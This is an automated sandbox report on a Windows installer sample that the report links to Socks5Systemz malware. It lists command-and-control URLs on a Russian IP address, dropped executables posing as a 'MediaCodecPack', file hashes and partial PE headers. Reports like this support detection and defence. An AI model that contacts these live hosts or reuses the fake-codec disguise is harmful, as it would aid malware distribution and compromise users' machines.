https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325 | 100% | Avira URL Cloud | malware
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4 | 100% | Avira URL Cloud | malware
https://188.119.66.185/A654B8DF3C4585F17B60DA6690D18421A0182C8 | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 | 100% | Avira URL Cloud | malware
http://wonderwork.ucoz.com/ | 0% | Avira URL Cloud | safe
No contacted domains info

Name | Malicious | Antivirus Detection | Reputation
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261cda3088 | false | Avira URL Cloud: malware | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | steel.exe.3.tmp, steel.exe.3.tmp, 00000001.00000000.1732720470.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-67S07.tmp.1.dr, steel.exe.3.tmp.0.dr | false | | high
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325 | mediacodecpack3.exe, 00000002.00000002.2981066269.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack3.exe, 00000002.00000002.2981066269.000000000087E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.remobjects.com/psU | steel.exe.3.exe, 00000000.00000003.1732080677.0000000002168000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000003.1731820756.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000000.1732720470.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-67S07.tmp.1.dr, steel.exe.3.tmp.0.dr | false | | high
https://188.119.66.185/priseCertificates | mediacodecpack3.exe, 00000002.00000002.2981066269.000000000089E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/ography | mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | steel.exe.3.exe | false | | high
https://188.119.66.185/rosoft | mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/ | mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/en-GB | mediacodecpack3.exe, 00000002.00000002.2981066269.000000000089E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline | steel.exe.3.exe | false | | high
http://wonderwork.ucoz.com/ | steel.exe.3.tmp, 00000001.00000002.2981700405.0000000005C8C000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack3.exe, 00000002.00000000.1743322718.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, mediacodecpack3.exe.1.dr, MediaCodecPack.exe.2.dr, is-VED6B.tmp.1.dr | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/A654B8DF3C4585F17B60DA6690D18421A0182C8 | mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4 | mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.remobjects.com/ps | steel.exe.3.exe, 00000000.00000003.1732080677.0000000002168000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000003.1731820756.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, steel.exe.3.tmp, 00000001.00000000.1732720470.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-67S07.tmp.1.dr, steel.exe.3.tmp.0.dr | false | | high
https://www.easycutstudio.com/support.html | steel.exe.3.exe, 00000000.00000003.1731421977.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000002.2980863339.0000000002161000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000003.1731515225.0000000002161000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000003.1733523612.0000000003130000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000003.1733603131.0000000002138000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000002.2981234148.0000000002138000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000002.2980978072.00000000005A3000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
46.8.225.74 | unknown | Russian Federation | 28917 | FIORD-AS IP-transit operator in Russia Ukraine and Baltics | false
188.119.66.185 | unknown | Russian Federation | 209499 | FLYNETRU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577455
Start date and time: 2024-12-18 13:43:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: steel.exe.3.exe
Detection: MAL
Classification: mal92.troj.evad.winEXE@5/26@0/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 193
• Number of non-executed functions: 273
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: steel.exe.3.exe
Time | Type | Description
07:44:37 | API Interceptor | 461270x Sleep call for process: mediacodecpack3.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
46.8.225.74 | AbC0LBkVhr.exe | malicious | Socks5Systemz
| KRdh0OaXqH.exe | malicious | Petite Virus, Socks5Systemz
| AGcC2uK0El.exe | malicious | Petite Virus, Socks5Systemz
| 6hvZpn91O8.exe | malicious | Petite Virus, Socks5Systemz
| j9htknb7BQ.exe | malicious | Petite Virus, Socks5Systemz
188.119.66.185 | Oz2UhFBTHy.exe | malicious | Socks5Systemz
| GEm3o8pION.exe | malicious | Socks5Systemz
| GEm3o8pION.exe | malicious | Socks5Systemz
| bzX2pV3Ybw.exe | malicious | Socks5Systemz
| bzX2pV3Ybw.exe | malicious | Socks5Systemz
| Ni2ghr9eUJ.exe | malicious | Socks5Systemz
| Ni2ghr9eUJ.exe | malicious | Socks5Systemz
| 2mtt3zE6Vh.exe | malicious | Socks5Systemz
| 2mtt3zE6Vh.exe | malicious | Socks5Systemz
| 7i6bUvYZ4L.exe | malicious | Socks5Systemz

No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FIORD-AS IP transit operator in Russia Ukraine and Baltics | AbC0LBkVhr.exe | malicious | Socks5Systemz | 46.8.225.74
 | KRdh0OaXqH.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
 | AGcC2uK0El.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
 | 6hvZpn91O8.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
 | j9htknb7BQ.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
 | b3astmode.arm5.elf | malicious | Mirai | 109.248.108.147
 | reduce.exe | malicious | GO Backdoor | 46.8.236.61
 | InsertSr.exe | malicious | GO Backdoor | 46.8.236.61
 | iKhdG3bwZK.exe | malicious | GO Backdoor | 46.8.236.61
 | ppc.elf | malicious | Mirai | 46.8.228.104
FLYNETRU | Oz2UhFBTHy.exe | malicious | Socks5Systemz | 188.119.66.185
 | GEm3o8pION.exe | malicious | Socks5Systemz | 188.119.66.185
 | GEm3o8pION.exe | malicious | Socks5Systemz | 188.119.66.185
 | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 188.119.66.185
 | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 188.119.66.185
 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 188.119.66.185
 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 188.119.66.185
 | 7i6bUvYZ4L.exe | malicious | Socks5Systemz | 188.119.66.185
Match | Associated Sample Name / URL | Detection | Threat Name | Context
 | 51c64c77e60f3980eea90869b68c58a8cd#U9988.exe | malicious | Unknown | 188.119.66.185
 | Oz2UhFBTHy.exe | malicious | Socks5Systemz | 188.119.66.185
 | GEm3o8pION.exe | malicious | Socks5Systemz | 188.119.66.185
 | GEm3o8pION.exe | malicious | Socks5Systemz | 188.119.66.185
 | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 188.119.66.185
 | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 188.119.66.185
 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 188.119.66.185
 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 188.119.66.185
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\ProgramData\MediaCodecPack\sqlite3.dll | AbC0LBkVhr.exe | malicious | Socks5Systemz |
 | Oz2UhFBTHy.exe | malicious | Socks5Systemz |
 | GEm3o8pION.exe | malicious | Socks5Systemz |
 | GEm3o8pION.exe | malicious | Socks5Systemz |
 | bzX2pV3Ybw.exe | malicious | Socks5Systemz |
 | bzX2pV3Ybw.exe | malicious | Socks5Systemz |
 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz |
 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz |
 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz |
 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz |
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3186888
                                                                                          Entropy (8bit):6.230475147166178
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:5YOSeerrANJi8JBsNkPB4jnCViGF1awdEYO:SVeevAb/2kZ4jGiGFdO
                                                                                          MD5:1BADA3AB49364C26DA68D41031611AC7
                                                                                          SHA1:5BBB3CA5C6CED071A4297E0DB6C8AA96B16FA96B
                                                                                          SHA-256:F8A65D51ACF7D271F7BA0114366234DCE29BE27CFB73CA94AF990EC379350149
                                                                                          SHA-512:CFA982246856746524ECF44D45F5697B52DC6E90A828625697116B856CB7B51080562607EB89910216D18C8C13E2AED2AAAD65C58F66DEE3B6CDB79405C36701
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Reputation:low
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L.....bg.................j...D.......#............@...........................1.......1.....................................4........ ..0...............................................................................\............................aitt5...h.......j.................. ..`.ajtt5...-...........n..............@..@.aktt5...d.......0..................@....rsrc........ ......................@..@.altt5...&.......$...|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):645592
                                                                                          Entropy (8bit):6.50414583238337
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: AbC0LBkVhr.exe, Detection: malicious, Browse
                                                                                          • Filename: Oz2UhFBTHy.exe, Detection: malicious, Browse
                                                                                          • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                                                          • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                                                          • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                                                          • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                                                          • Filename: Ni2ghr9eUJ.exe, Detection: malicious, Browse
                                                                                          • Filename: Ni2ghr9eUJ.exe, Detection: malicious, Browse
                                                                                          • Filename: 2mtt3zE6Vh.exe, Detection: malicious, Browse
                                                                                          • Filename: 2mtt3zE6Vh.exe, Detection: malicious, Browse
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          File Type:ISO-8859 text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8
                                                                                          Entropy (8bit):2.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:1/ll:1X
                                                                                          MD5:16F53EB40A5CB727DC7793ABC24F0063
                                                                                          SHA1:F7B6FF4E0F58E3DC9CF59175867507A2F5D8635F
                                                                                          SHA-256:86E21BEF56B5100688B23F55EE134E8A5C4A3F3927795EDBD3447F6DFC55E312
                                                                                          SHA-512:D99656AFDF7B176E3641B30D4D8FC2A169A827BA1056991024C3ED17F2F3B3528BC02623D0E6E65D5E58148E5D3D401EA02E03B3FD20AD33B1D13FD71172B82E
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:..bg....
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4
                                                                                          Entropy (8bit):0.8112781244591328
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Xln:1
                                                                                          MD5:ED69DFADEF68FC181AAE2D22715A01D6
                                                                                          SHA1:3A9981C3761721792B7702231583758AE5ACF8A7
                                                                                          SHA-256:3EF3BD3D6658C0DFDFDD7AA65E3D92BF1DA9A04678A4ED2A5D84ED824EC91775
                                                                                          SHA-512:B70AF13C96AC7C3AC97C84F9EFC1F38794B190635AB602CE35C8572B9C3597DD1A4ABBFFCCB3AD8AE76CDB247C221168F2D45B7225A56444FF445937921FC318
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:....
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):128
                                                                                          Entropy (8bit):2.9012093522336393
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
                                                                                          MD5:679DD163372163CD8FFC24E3C9E758B3
                                                                                          SHA1:F307C14CA65810C8D0238B89B49B2ACD7C5B233B
                                                                                          SHA-256:510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
                                                                                          SHA-512:46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1645320
                                                                                          Entropy (8bit):6.787752063353702
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                          MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                          SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                          SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                          SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):348160
                                                                                          Entropy (8bit):6.542655141037356
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                          MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                          SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                          SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                          SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):645592
                                                                                          Entropy (8bit):6.50414583238337
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):499712
                                                                                          Entropy (8bit):6.414789978441117
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                          MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                          SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                          SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                          SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:MS Windows HtmlHelp Data
                                                                                          Category:dropped
                                                                                          Size (bytes):78183
                                                                                          Entropy (8bit):7.692742945771669
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                          MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                          SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                          SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                          SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1645320
                                                                                          Entropy (8bit):6.787752063353702
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                          MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                          SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                          SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                          SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):176128
                                                                                          Entropy (8bit):6.204917493416147
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                          MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                          SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                          SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                          SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):3186888
                                                                                          Entropy (8bit):6.230474684772782
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:MYOSeerrANJi8JBsNkPB4jnCViGF1awdEYO:lVeevAb/2kZ4jGiGFdO
                                                                                          MD5:E83CE4636B3E2DB208D20BF34F505D15
                                                                                          SHA1:B4AC7F4F9430B766EFCAC3226F88DBA886F8187D
                                                                                          SHA-256:7A5B7EB1FD83DC074CFB64F5E1B44CCABFA7C9B56070161FAE8CA382A43C54CE
                                                                                          SHA-512:437011046262723E831819FA037EFD4FA6BED1D8B976D3D60080FD1E926B70E431464B7212DAFD88801ED0FDD4934B37C509DC2C675F674DF7EF9E9B82546D2C
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-VED6B.tmp, Author: Joe Security
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:MS Windows HtmlHelp Data
                                                                                          Category:dropped
                                                                                          Size (bytes):78183
                                                                                          Entropy (8bit):7.692742945771669
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                          MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                          SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                          SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                          SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                          Malicious:false
